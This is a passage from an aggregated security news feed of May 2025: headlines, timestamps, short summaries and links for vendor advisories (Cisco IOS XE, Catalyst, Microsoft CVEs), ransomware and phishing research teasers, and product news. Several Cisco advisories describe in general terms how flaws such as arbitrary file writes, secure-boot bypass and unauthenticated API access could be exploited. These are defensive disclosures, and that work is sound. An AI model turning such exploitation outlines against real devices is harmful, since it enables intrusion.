make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.Conclusion This blog post described my journey into the world of MacOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach can allow rapid prototyping and iteration, a deep understanding of the target, and high impact bugs. In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.

https://googleprojectzero.blogspot.com/2025/05/breaking-sound-barrier-part-i-fuzzing.html
Huawei's ADN Level 4 Solution Won Autonomous Network Operations Award at FutureNet World 2025
2025-05-09T17:07:00Z | 1746810420

At FutureNet World 2025 in London, Huawei was honored as the first vendor to receive the Autonomous Network Operations award

//www.huawei.com/en/news/2025/5/futurenet-world2025-adn
SAST vs DAST: Differences And When to Use
2025-05-09T16:49:43Z | 1746809383

Anyone working in the software development field knows cybersecurity is a threat you cannot afford to downplay. A cyberattack on a product or service you’ve created carries a risk of serious financial and reputational damage, as well as regulatory penalties, depending on the industry and jurisdiction. Defending your software against cyberattacks means addressing security at […]

https://blog.jetbrains.com/teamcity/2025/05/sast-vs-dast/
HSM 5.6.5 Release: Seamless Security, Smarter Management
2025-05-09T15:49:17Z | 1746805757

Security never sleeps, and neither do we. Our latest release Hillstone Security Management Platform (HSM) 5.6.5 is designed to make your security infrastructure more resilient, adaptable, and easier to manage. Whether you’re dealing with high-availability setups, keeping up with ever-changing threats, or ensuring compliance through log management—this update has you covered. High Availability Firewall Support: […] The post HSM 5.6.5 Release: Seamless Security, Smarter Management appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/hsm-5-6-5-release-seamless-security-smarter-management/
CERT-SE:s veckobrev v.19
2025-05-09T13:11:00Z | 1746796260

Nästa vecka kommer en ny funktionalitet att introduceras i tjänsten ANTS. Mottagare av ANTS-utskicken kommer framöver även att få information om misstänkt komprometterade enheter som identifierats i organisationens nätverk. Läs mer om ANTS här: https://www.cert.se/rad-och-stod/ants/

https://www.cert.se/2025/05/cert-se-veckobrev-v19.html
LockBit ransomware group falls victim to hackers itself
2025-05-09T12:15:47Z | 1746792947

A data leak has revealed negotiations with victims, along with Bitcoin wallet addresses, affiliate accounts and details of attacks

https://www.itpro.com/security/ransomware/lockbit-ransomware-group-falls-victim-to-hackers
Security in 20 seconds: Experts on the clock!
2025-05-09T12:00:00Z | 1746792000

Learn about the latest security trends from Cisco executives, security experts, and special guests! They only have 20 seconds to answer, will the beat the clock? More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/security-in-20-seconds-experts-on-the-clock.html
Gain Deeper Visibility into Risks to Meet Security Compliance Demands
2025-05-09T12:00:00Z | 1746792000

https://www.akamai.com/blog/security/2025/may/gain-visibility-risks-meet-security-compliance-demands
LockBit ransomware gang breached, secrets exposed
2025-05-09T11:16:30Z | 1746789390

Oh dear, what a shame, never mind. Read more in my article on the Tripwire State of Security blog.

https://www.tripwire.com/state-of-security/lockbit-ransomware-gang-breached-secrets-exposed
AI-powered banking fraud on the rise – but financial institutions are fighting back
2025-05-09T10:24:35Z | 1746786275

Banks are increasingly using AI to combat scams, but say that the need for good data management can make progress slow

https://www.itpro.com/security/ai-powered-banking-fraud-on-the-rise-but-financial-institutions-are-fighting-back
Stealthy .NET Malware: Hiding Malicious Payloads as Bitmap Resources
2025-05-09T10:00:50Z | 1746784850

Unit 42 details a new malware obfuscation technique where threat actors hide malware in bitmap resources within .NET applications. These deliver payloads like Agent Tesla or XLoader. The post Stealthy .NET Malware: Hiding Malicious Payloads as Bitmap Resources appeared first on Unit 42.

https://unit42.paloaltonetworks.com/malicious-payloads-as-bitmap-resources-hide-net-malware/
Lumma Stealer, coming and going
2025-05-09T09:12:36Z | 1746781956

The high-profile information stealer switches up its TTPs, but keeps the CAPTCHA tactic; we take a deep dive

https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/
Hackers hit deportation airline GlobalX, leak flight manifests, and leave an unsubtle message for “Donnie” Trump
2025-05-09T09:04:13Z | 1746781453

GlobalX Airlines, a charter airline being used by the US government for deportation flights, has been attacked by hacktivists who have made off with what they claim are detailed flight records and passenger manifests. Read more in my article for the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/hackers-globalx-message-trump
Catching a phish with many faces
2025-05-09T09:00:00Z | 1746781200

Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly

https://www.welivesecurity.com/en/scams/spotting-phish-many-faces/
Tricked by trust: How OAuth and device code flows get abused
2025-05-09T07:43:55Z | 1746776635

In today’s cloud-first environments, access tokens have become the new keys to the kingdom. Attackers no longer need passwords or multifactor authentication (MFA) codes to compromise an environment. A single valid access token can grant broad and often silent access to critical cloud resources, making detection and containment significantly more challenging. [...] The post Tricked by trust: How OAuth and device code flows get abused appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/how-oauth-and-device-code-flows-get-abused/
Tricked by trust: How OAuth and device code flows get abused
2025-05-09T07:43:55Z | 1746776635

In today’s cloud-first environments, access tokens have become the new keys to the kingdom. Attackers no longer need passwords or multifactor authentication (MFA) codes to compromise an environment. A single valid access token can grant broad and often silent access to critical cloud resources, making detection and containment significantly more challenging. [...] The post Tricked by trust: How OAuth and device code flows get abused appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/how-oauth-and-device-code-flows-get-abused/
Identification for our electronic services is changing – enabling Suomi.fi Messages suggested during identification
2025-05-09T07:32:39Z | 1746775959

The Digital and Population Data Services Agency (DVV) is reforming Suomi.fi e-Identification. From 12 May 2025 onwards, you may be prompted to enable Suomi.fi Messages when you strongly authenticate yourself in an authority’s electronic service. The change also applies to Traficom’s e-services.

https://traficom.fi/en/news/identification-our-electronic-services-changing-enabling-suomifi-messages-suggested-during
Identification for our electronic services is changing – enabling Suomi.fi Messages suggested during identification
2025-05-09T07:32:39Z | 1746775959

The Digital and Population Data Services Agency (DVV) is reforming Suomi.fi e-Identification. From 12 May 2025 onwards, you may be prompted to enable Suomi.fi Messages when you strongly authenticate yourself in an authority’s electronic service. The change also applies to Traficom’s e-services.

https://traficom.fi/en/news/identification-our-electronic-services-changing-enabling-suomifi-messages-suggested-during
Elastic Kibana Prototype Contamination Leads to Arbitrary Code Execution Vulnerability (CVE-2025-25014)
2025-05-09T06:34:26Z | 1746772466

Overview Recently, NSFOCUS CERT detected that Elastic issued a security bulletin to fix the arbitrary code execution vulnerability caused by Elastic Kibana prototype contamination (CVE-2025-25014); Due to the prototype contamination problem in Kibana, an attacker with specific role privileges can bypass the authentication mechanism by constructing specially crafted file uploads and specific HTTP requests to […] The post Elastic Kibana Prototype Contamination Leads to Arbitrary Code Execution Vulnerability (CVE-2025-25014) appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/elastic-kibana-prototype-contamination-leads-to-arbitrary-code-execution-vulnerability-cve-2025-25014/
The NCSC wants developers to get serious on software security
2025-05-09T06:00:00Z | 1746770400

The NCSC's new Software Security Code of Practice has been welcomed by cyber professionals as a positive step toward bolstering software supply chain security.

https://www.itpro.com/software/software-security-code-of-practice-ncsc-announcement
Cisco Catalyst SD-WAN Manager Arbitrary File Overwrite Vulnerability
2025-05-09T05:55:57Z | 1746770157

A vulnerability in the CLI of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, local attacker to overwrite arbitrary files on the local file system of an affected device. To exploit this vulnerability, the attacker must have valid read-only credentials with CLI access on the affected system. This vulnerability is due to improper access controls on files that are on the local file system. An attacker could exploit this vulnerability by running a series of crafted commands on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device and gain privileges of the root user. To exploit this vulnerability, an attacker would need to have CLI access as a low-privilege user. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-fileoverwrite-Uc9tXWH Security Impact Rating: Medium CVE: CVE-2025-20213

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-fileoverwrite-Uc9tXWH
Critical Infrastructure Protection: What It Is and Why It Matters to Utilities
2025-05-09T04:21:45Z | 1746764505

In an era of increasing cyber threats, protecting critical infrastructure - like power grids, water systems, and pipelines - is no longer optional. For utility providers, it’s the foundation of operational continuity and national security. But what exactly is critical infrastructure protection, and why does it matter so much in the utility industry? This comprehensive guide explores the fundamentals, emerging trends, and regulatory landscape of critical infrastructure protection with a focus on cybersecurity aspects.

https://www.zentera.net/blog/critical-infrastructure-protection
Security Alert (A25-05-06): Multiple Vulnerabilities in Cisco Products
2025-05-09T04:00:00Z | 1746763200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-07): Vulnerability in Microsoft Edge
2025-05-09T04:00:00Z | 1746763200

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
What is a Data Diode?
2025-05-09T02:18:00Z | 1746757080

Understanding Unidirectional Data Flow and Network Security

https://www.opswat.com/blog/data-diodes
Chromium: CVE-2025-4372 Use after free in WebAudio
2025-05-08T23:20:05Z | 1746746405

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202 5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-4372
What’s New in Proactive DLP 2.23.0
2025-05-08T23:00:00Z | 1746745200

Enhanced AI Capabilities for NSFW, Toxic Content, and PII Protection

https://www.opswat.com/blog/whats-new-in-proactive-dlp-2-23-0
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
2025-05-08T22:54:49Z | 1746744889

The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table […]

https://blog.qualys.com/category/vulnerabilities-threat-research
Relationships, Adaptability, & the Future of Business Technology Leadership
2025-05-08T20:17:41Z | 1746735461

The future of business technology leadership is being reshaped daily; by AI, cloud-native operations, decentralized decision-making, and rapidly shifting business demands. In this evolving landscape, titles matter less than mindset. Whether you’re a CIO, a VP of engineering, a security leader, or a digital transformation manager, the way you lead through technology is changing. What […] The post Relationships, Adaptability, & the Future of Business Technology Leadership appeared first on Netskope.

https://www.netskope.com/blog/relationships-adaptability-the-future-of-business-technology-leadership
Enterprise AI Adoption & Security Risk – Now with 100% More Chaos
2025-05-08T19:22:52Z | 1746732172

Welcome to the Wild West of enterprise AI. Twelve months ago, your CFO was still suspicious of chatbots. Today, they’re... The post Enterprise AI Adoption & Security Risk – Now with 100% More Chaos appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/enterprise-ai-adoption-security-risk-now-with-100-more-chaos.html
Putting the dampener on tamperers
2025-05-08T18:43:06Z | 1746729786

Taking a dive into Sophos Tamper Protection

https://news.sophos.com/en-us/2025/05/08/putting-the-dampener-on-tamperers/
The IT help desk kindly requests you read this newsletter
2025-05-08T18:01:48Z | 1746727308

How do attackers exploit authority bias to manipulate victims? Martin shares proactive strategies to protect yourself and others in this must-read edition of the Threat Source newsletter.

https://blog.talosintelligence.com/the-it-help-desk-kindly-requests-you-read-this-newsletter/
Insider Threat Detection: How to Identify and Mitigate Internal Cyber Risks
2025-05-08T18:00:00Z | 1746727200

Insider threat detection has become one of the most critical aspects of modern cybersecurity. Unlike external attacks, which originate from outside an organization, insider threats stem from individuals with legitimate access to sensitive systems, data, or facilities. This makes them harder to detect and often more damaging.  What is Insider Threat Detection?  Insider threat detection refers to the process of identifying threats posed by trusted individuals—such as... Read more » The post Insider Threat Detection: How to Identify and Mitigate Internal Cyber Risks appeared first on Plixer.

https://www.plixer.com/blog/insider-threat-detection/
Silent Push Events: April 2025
2025-05-08T17:33:16Z | 1746725596

RSA, San Francisco, April 28-May 1  Last week, we were at the Moscone Center in San Francisco for the world’s largest cybersecurity event, RSA, along with 45,000 professionals from across the globe, to explore emerging threats, share innovations, and shape the future of digital defense.  Our conversations with CISOs, industry leaders, threat analysts, and security […] The post Silent Push Events: April 2025 appeared first on Silent Push.

https://www.silentpush.com/blog/silent-push-events-april-2025/
NICKEL TAPESTRY expands fraudulent worker operations
2025-05-08T16:45:18Z | 1746722718

The North Korean IT worker scheme grows to include organizations in Europe and Asia and industries beyond the technology sector

https://news.sophos.com/en-us/2025/05/08/nickel-tapestry-expands-fraudulent-worker-operations/
How China’s Admission Reinforces the Urgency for AI-Powered, Preemptive Cybersecurity
2025-05-08T15:27:12Z | 1746718032

In December, a senior Chinese cyber official offered what U.S. representatives took as tacit admission: China was behind a series of cyber intrusions targeting U.S. critical infrastructure. As reported by The Wall Street Journal, this extraordinary moment came during a closed-door meeting in Geneva—one that has since confirmed what many cybersecurity professionals have long suspected: the next stage of overt cyber action might be here.

https://mixmode.ai/blog/how-chinas-admission-reinforces-the-urgency-for-ai-powered-preemptive-cybersecurity/
Cloud vs. on-prem vulnerability management: Hybrid matters
2025-05-08T14:00:00Z | 1746712800

Vulnerability management requires different approaches in on-prem and cloud environments due to differences in infrastructure, scale, and operational models. As... The post Cloud vs. on-prem vulnerability management: Hybrid matters appeared first on Sysdig.

https://sysdig.com/blog/cloud-vs-on-prem-vulnerability-management/
Cloud vs. on-prem vulnerability management: Hybrid matters
2025-05-08T14:00:00Z | 1746712800

Vulnerability management requires different approaches in on-prem and cloud environments due to differences in infrastructure, scale, and operational models. As... The post Cloud vs. on-prem vulnerability management: Hybrid matters appeared first on Sysdig.

https://sysdig.com/blog/cloud-vs-on-prem-vulnerability-management/
FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network
2025-05-08T13:55:29Z | 1746712529

FreeDrain is a modern, scalable phishing operation exploiting weaknesses in free publishing platforms to steal cryptocurrency on a global scale.

https://www.sentinelone.com/labs/freedrain-unmasked-uncovering-an-industrial-scale-crypto-theft-network/
18 Billion Reasons to Monitor IoT Performance at the Edge
2025-05-08T13:00:00Z | 1746709200

There are about 18 billion Internet of Things (IoT) devices in use today. For context, there are “only” 8 billion people in the world. These IoT devices, from industrial scanners to retail sensors, are embedded in daily operations, handling tasks that were once manual, siloed, or slow to scale. As more industries rely...

https://www.netscout.com/blog/18-billion-reasons-monitor-iot-performance-edge
Interlock Intrusion: How Interlock Achieves Encryption
2025-05-08T13:00:00Z | 1746709200

Background Organizations often call on GuidePoint Security analysts to support and consult on Digital Forensics and Incident Response (DFIR) efforts, […]

https://www.guidepointsecurity.com/blog/interesting-interlock-intrusion-how-interlock-achieves-encryption/
CC-4652 - Cisco Releases May 2025 IOS XE Software Security Advisory Bundled Publication
2025-05-08T12:56:00Z | 1746708960

Severity: Medium Bundled publication contains 20 security advisories, including one critical vulnerability Bundled publication contains 20 security advisories, including one critical vulnerability Updated: 30 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4652
From Digital Breadcrumbs to Court-Ready Narratives
2025-05-08T12:53:04Z | 1746708784

Effective lawful intelligence solutions do more than just ingest and analyze data. They build evidential narratives compelling enough for court that are backed by a fully auditable chain of custody. The post From Digital Breadcrumbs to Court-Ready Narratives appeared first on SS8.

https://www.ss8.com/from-digital-breadcrumbs-to-court-ready-evidential-narratives/
Webinar: Osnovni postupci izdavanja certifikata
2025-05-08T12:22:34Z | 1746706954

Pozivamo vas na webinar “Osnovni postupci izdavanja certifikata” koji će se održati 15. svibnja u 10 sati. Webinar je namijenjen korisnicima usluge besplatnih elektroničkih certifikata, a održat će ga CARNET-ov TCS tim (Trusted Certificate Service). Cilj webinara je prikaz osnovnih postupaka te pružanje odgovora na najčešća pitanja vezana uz novog davatelja usluge – grčku organizaciju... The post Webinar: Osnovni postupci izdavanja certifikata first appeared on CERT.hr.

https://www.cert.hr/webinar-osnovni-postupci-izdavanja-certifikata/
AI Agent for Color Red
2025-05-08T12:00:00Z | 1746705600

AI can automate the analysis, generation, testing, and reporting of exploits. It's particularly relevant in penetration testing and ethical hacking scenarios.

https://blogs.cisco.com/security/ai-agent-for-color-red/
UK's schoolgirl cyber security champions joined by undeclared war star at prestigious awards night
2025-05-08T11:57:09Z | 1746705429

Winning teams from the National Cyber Security Centre’s 2023 CyberFirst Girls Competition attend prize-giving ceremony in Belfast.

https://www.ncsc.gov.uk/news/cyber-security-champions-joined-by-undeclared-war-star-at-prestigious-awards-nights
Ransomware: 'WannaCry' guidance for home users and small businesses
2025-05-08T11:54:52Z | 1746705292

Guidance for home users or small businesses who want to reduce the likelihood of being held to ransom by WannaCry (or other types of ransomware).

https://www.ncsc.gov.uk/guidance/wannacry-guidance-for-home-users-and-small-businesses
Ransomware: 'WannaCry' guidance for enterprise administrators
2025-05-08T11:47:37Z | 1746704857

Guidance for enterprise administrators who want to reduce the likelihood of being held to ransom by WannaCry (or other types of ransomware).

https://www.ncsc.gov.uk/guidance/ransomware-wannacry-guidance-enterprise-administrators-1
Introduction to logging for security purposes
2025-05-08T11:37:52Z | 1746704272

Laying the groundwork for incident readiness.

https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes
Cyber security for major events
2025-05-08T11:32:28Z | 1746703948

Assessing the cyber security needs of major events.

https://www.ncsc.gov.uk/guidance/cyber-security-for-major-events
Vulnerabilities in Netis Systems WF2220 software
2025-05-08T11:00:00Z | 1746702000

CERT Polska has received a report about 2 vulnerabilities (CVE-2025-3758 and CVE-2025-3759) found in Netis Systems WF2220 software.

https://cert.pl/en/posts/2025/05/CVE-2025-3758/
Spam campaign targeting Brazil abuses Remote Monitoring and Management tools
2025-05-08T10:00:43Z | 1746698443

A new spam campaign is targeting Brazilian users with a clever twist — abusing the free trial period of trusted remote monitoring tools and the country’s electronic invoice system to spread malicious agents.

https://blog.talosintelligence.com/spam-campaign-targeting-brazil-abuses-rmm-tools/
HUMAN Security Q1 2025 Product Updates
2025-05-08T10:00:00Z | 1746698400

At HUMAN Security, we’re focused on staying ahead of evolving threats by delivering solutions that protect every critical layer of the digital experience. From bot defense and account protection to ad fraud and client-side security, we continue to innovate so our customers can navigate current and future threats with confidence. In this update, we’re highlighting […] The post HUMAN Security Q1 2025 Product Updates appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/human-security-q1-2025-product-updates/
TeamCity 2025.03.2 Is Out
2025-05-08T09:27:07Z | 1746696427

Today we’re rolling out TeamCity On-Premises 2025.03.2, the second bug-fix update for the major TeamCity version released in back in March. This update addresses a few product issues, such as: Bug-fix updates also include performance improvements and security patches, so it’s always a good idea to install them as they come out. See TeamCity 2025.03.2 […]

https://blog.jetbrains.com/teamcity/2025/05/teamcity-2025-03-2-bug-fix/
Palo Alto Networks: Champion in Two Canalys Global Leadership Matrices
2025-05-08T09:00:26Z | 1746694826

A Champion in 2 Canalys Global Leadership matrices for 2025 showcases our commitment to partner/customer success with AI-powered cybersecurity solutions. The post Palo Alto Networks: Champion in Two Canalys Global Leadership Matrices appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/champion-two-canalys-global-leadership-matrices/
ESG Watch | May 2025
2025-05-08T08:56:52Z | 1746694612

Key news in this edition: Worst quarter on record for ESG funds. UK regulator mandates climate risk evaluations by banks and insurers. Green Impact Exchange gets SEC approval. Editorial Since the beginning of 2025, ESG investment has faced a period of uncertainty. In the first quarter of the year, global sustainability funds saw record net outflows of USD 8.6 billion, according to Morningstar, an investment data provider. Europe, traditionally the sector’s most stable market, recorded its first outflow since tracking began in 2018. Despite total assets in global ESG funds remaining high at USD 3.16 trillion, investor confidence is clearly under pressure. Political shifts, inconsistent regulation, and weaker performance in areas like clean energy are all contributing to the unease.

https://www.s-rminform.com/esg-watch/esg-watch-may-2025
The days of bringing your own device to work could be coming to an end
2025-05-08T07:30:00Z | 1746689400

Security concerns are prompting a rethink of ‘bring your own device’ policies

https://www.itpro.com/security/bring-your-own-device-security-risks-kinly
CVE-2025-47732 Microsoft Dataverse Remote Code Execution Vulnerability
2025-05-08T07:00:00Z | 1746687600

Information published.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47732
CVE-2025-47733 Microsoft Power Apps Information Disclosure Vulnerability
2025-05-08T07:00:00Z | 1746687600

Server-Side Request Forgery (SSRF) in Microsoft Power Apps allows an unauthorized attacker to disclose information over a network

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47733
CVE-2025-29813 Azure DevOps Elevation of Privilege Vulnerability
2025-05-08T07:00:00Z | 1746687600

An elevation of privilege vulnerability exists when Visual Studio improperly handles pipeline job tokens. An attacker who successfully exploited this vulnerability could extend their access to a project. To exploit this vulnerability, an attacker would first have to have access to the project and swap the short-term token for a long-term one. The update addresses the vulnerability by correcting how the Visual Studio updater handles these tokens.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29813
CVE-2025-29827 Azure Automation Elevation of Privilege Vulnerability
2025-05-08T07:00:00Z | 1746687600

Improper Authorization in Azure Automation allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29827
CVE-2025-29972 Azure Storage Resource Provider Spoofing Vulnerability
2025-05-08T07:00:00Z | 1746687600

Server-Side Request Forgery (SSRF) in Azure allows an authorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29972
CVE-2025-33072 Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability
2025-05-08T07:00:00Z | 1746687600

Improper access control in Azure allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33072
UK pioneering global move away from passwords
2025-05-08T06:50:00Z | 1746687000

Government to roll out passkey technology across digital services as an alternative to SMS-based verification.

https://www.ncsc.gov.uk/news/government-adopt-passkey-technology-digital-services
Two Battlegrounds: India-Pakistan Conflicts and DDoS Attacks
2025-05-08T06:32:58Z | 1746685978

Background Monitoring data from the Global Threat Hunting System of NSFOCUS Fuying Lab shows that since the terrorist attack on tourists in Pahargam Town, Indian-controlled Kashmir on April 22, 2025 (killing 26 people), there has been a significant surge in DDoS attacks between India and Pakistan. This escalation of cyber confrontation is highly consistent with […] The post Two Battlegrounds: India-Pakistan Conflicts and DDoS Attacks appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/two-battlegrounds-india-pakistan-conflicts-and-ddos-attacks/
Why does cybersecurity still struggle with professionalization?
2025-05-08T06:00:00Z | 1746684000

Professional standards could be the answer to the ongoing cyber skills shortage

https://www.itpro.com/security/why-does-cybersecurity-still-struggle-with-professionalization
Cisco IOS XE Software Bootstrap Arbitrary File Write Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the bootstrap loading of Cisco IOS XE Software could allow an authenticated, local attacker to write arbitrary files to an affected system. This vulnerability is due to insufficient input validation of the bootstrap file that is read by the system software when a device is first deployed in SD-WAN mode or when an administrator configures SD-Routing on the device. An attacker could exploit this vulnerability by modifying a bootstrap file generated by Cisco Catalyst SD-WAN Manager, loading it into the device flash, and then either reloading the device in a green field deployment in SD-WAN mode or configuring the device with SD-Routing. A successful exploit could allow the attacker to perform arbitrary file writes to the underlying operating system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bootstrap-KfgxYgdh This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20155

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bootstrap-KfgxYgdh
Cisco IOS Software for Cisco Catalyst 2960X, 2960XR, 2960CX, and 3560CX Series Switches Secure Boot Bypass Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in Cisco IOS Software for Cisco Catalyst 2960X, 2960XR, 2960CX, and 3560CX Series Switches could allow an authenticated, local attacker with privilege level 15 or an unauthenticated attacker with physical access to the device to execute persistent code at boot time and break the chain of trust. This vulnerability is due to missing signature verification for specific files that may be loaded during the device boot process. An attacker could exploit this vulnerability by placing a crafted file into a specific location on an affected device. A successful exploit could allow the attacker to execute arbitrary code at boot time. Because this allows the attacker to bypass a major security feature of the device, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-c2960-3560-sboot-ZtqADrHq This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20181

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-c2960-3560-sboot-ZtqADrHq
Cisco Catalyst SD-WAN Manager Certificate Validation Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in certificate validation processing of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an unauthenticated, remote attacker to gain access to sensitive information. This vulnerability is due to improper validation of certificates that are used by the Smart Licensing feature. An attacker with a privileged network position could exploit this vulnerability by intercepting traffic that is sent over the Internet. A successful exploit could allow the attacker to gain access to sensitive information, including credentials used by the device to connect to Cisco cloud services. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catalyst-tls-PqnD5KEJ Security Impact Rating: Medium CVE: CVE-2025-20157

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catalyst-tls-PqnD5KEJ
Cisco Catalyst Center Insufficient Access Control Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in Cisco Catalyst Center, formerly Cisco DNA Center, could allow an authenticated, remote attacker to read and modify data in a repository that belongs to an internal service of an affected device. This vulnerability is due to insufficient enforcement of access control on HTTP requests. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catc-insec-acc-mtt8EhEb Security Impact Rating: Medium CVE: CVE-2025-20223

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catc-insec-acc-mtt8EhEb
Cisco Catalyst Center Unauthenticated API Access Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the management API of Cisco Catalyst Center, formerly Cisco DNA Center, could allow an unauthenticated, remote attacker to read and modify the outgoing proxy configuration settings. This vulnerability is due to the lack of authentication in an API endpoint. An attacker could exploit this vulnerability by sending a request to the affected API of a Catalyst Center device. A successful exploit could allow the attacker to view or modify the outgoing proxy configuration, which could disrupt internet traffic from Cisco Catalyst Center or may allow the attacker to intercept outbound internet traffic. Note: For information about Cisco Catalyst Center features that require an internet connection and the corresponding internet domains used, see the Required internet URLs and fully qualified domain names section of the Cisco Catalyst Center Third-Generation Appliance Installation Guide. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dnac-api-nBPZcJCM Security Impact Rating: High CVE: CVE-2025-20210

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dnac-api-nBPZcJCM
Cisco IOS XE Wireless Controller Software Cisco Discovery Protocol Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in Cisco IOS XE Wireless Controller Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation of access point (AP) Cisco Discovery Protocol (CDP) neighbor reports when they are processed by the wireless controller. An attacker could exploit this vulnerability by sending a crafted CDP packet to an AP. A successful exploit could allow the attacker to cause an unexpected reload of the wireless controller that is managing the AP, resulting in a DoS condition that affects the wireless network. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-cdp-dos-fpeks9K This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20202

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-cdp-dos-fpeks9K
Cisco IOS XE Wireless Controller Software Unauthorized User Deletion Vulnerability
2025-05-08T06:00:00Z | 1746684000

